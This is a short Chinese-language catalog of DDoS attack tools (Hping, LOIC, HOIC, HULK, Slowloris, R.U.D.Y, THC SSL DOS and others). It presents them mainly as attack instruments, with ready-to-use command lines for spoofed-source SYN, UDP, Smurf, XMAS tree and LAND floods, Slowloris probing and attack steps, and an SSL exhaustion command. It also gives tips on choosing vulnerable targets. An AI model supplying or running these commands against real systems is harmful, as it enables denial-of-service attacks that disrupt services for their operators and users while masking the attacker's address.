DDoS攻击工具
综合性工具
Hping
Hping是一个编码和解码TCP/IP协议的命令行开发工具,常用于测试网络及主机的安全,同时也可以做安全审计、防火墙测试等工具的标配工具;Hping的命令行就像常用的ping命令,不同的是,它不仅能发送ICMP请求,而且支持TCP、UDP、RAW-IP等协议;Hping的特色在于能够定制数据包的各个部分。
Hping常常别用做网络攻击工具,使用Hping可以方便的额构造DoS攻击,如:ICMP洪水攻击、UDP洪水攻击、SYN洪水攻击等。
Hping的常用功能包括网络压力测试、防火墙测试、端口扫描等。
Hping操作
- SYN+FIN
hping3 目標主機IP -i u100000 -S -F -a 偽造來源IP
- FIN+SYN+RSP+PSH+ACK+UDP
hping3 目标主机IP -i u100000 -F -S -R -A -U -a 伪造来源IP
- 伪造IP的UDP封包
hping3 目标主机IP -i u100000 -2 -a 伪造来源IP
- 伪造IP内含数据代码
hping3 目标主机IP -i u100000 -d[封包数据] -E[文件名] -a[伪造源IP]
- SMURF攻击
hping3 -1 -a 192.168.1.5 192.168.1.255
- XMAS TREE攻击
hping3 -SFRP 目标IP
- LAND攻击
hping3 -k -S -s 25 -p 25 -a 伪造源IP地址
- 用tcpdump的记录流量
PenTBox
三个主体功能
密码算法工具
网络工具(压力测试、溢出攻击)
Web安全测试工具
Zarp
- 启动Zarp.py
压力测试工具
LOIC
LOIC,低轨道离子炮;开源的网络压力测试工具。
- Windows平台LOIC启动界面
HOIC
HOIC,高轨道离子炮;是一款基于HTTP协议的开源DDoS工具,HOIC主要用于内部网络和外部服务器安全性和稳定性能测试;
HOIC可以发送多线程的HTTP FLOOD洪水攻击;同样额HOIC也同样无法隐藏源IP地址。
HULK
HULK是一款基于Python的Web压力测试工具。HULK默认启动500线程对目标发起高频率的HTTP GET洪水攻击请求,独特之处在于,每一次的请求都是独一的,由此可以绕开服务器端采用缓存的防范措施。同时HULK也支持User-Agent和referer的伪造。
专业的攻击工具
Slowloris
Slowloris的使用较为简单,一般分为两个步骤:
- 首先是对目标进行探测:
perl slowloris.pl -dns 目标IP -port 目标端口号 -test
对目标进行探测的主要目的是获取目标服务器的连接时间,当目标服务器的时间超时小于166秒,工具运行会出现异常,所以建议选择超时时间大于200秒以上的目标。
- 实施攻击
perl slowloris.pl -dns 目标IP -port 目标端口号 - timeout TTL
在之前提过,该攻击方法是有不足的,只能针对部分的web服务端有效;目前收到影响的有:Apache1.x/2.x、dhttpd、GoAhead、WebServer、Squid等;而IIS则不受影响。
R.U.D.Y
RUDY采用一种慢速的HTTP POST请求的方式给目标发动攻击。与之前的Slowloris利用请求Header部分不同,RUDY利用的是请求的body部分;因为服务器端会根据Content-Length字段的内容值持续等待,直到客户端数据发送完毕。
THC SSL DOS
THC SSL DOS 利用SSL中已知弱点而使其DoS;这种攻击是非对称的,一次客户请求就可以让服务端进行相当于客户端的15倍的CPU资源进行处理。
thc-ssl-dos --accept xxx.xxx.xxx.xxx [prot]xx
利用THC SSL DOS工具,一台性能和带宽中等的主机就可以挑战高性能的服务器;攻击效果非常明显。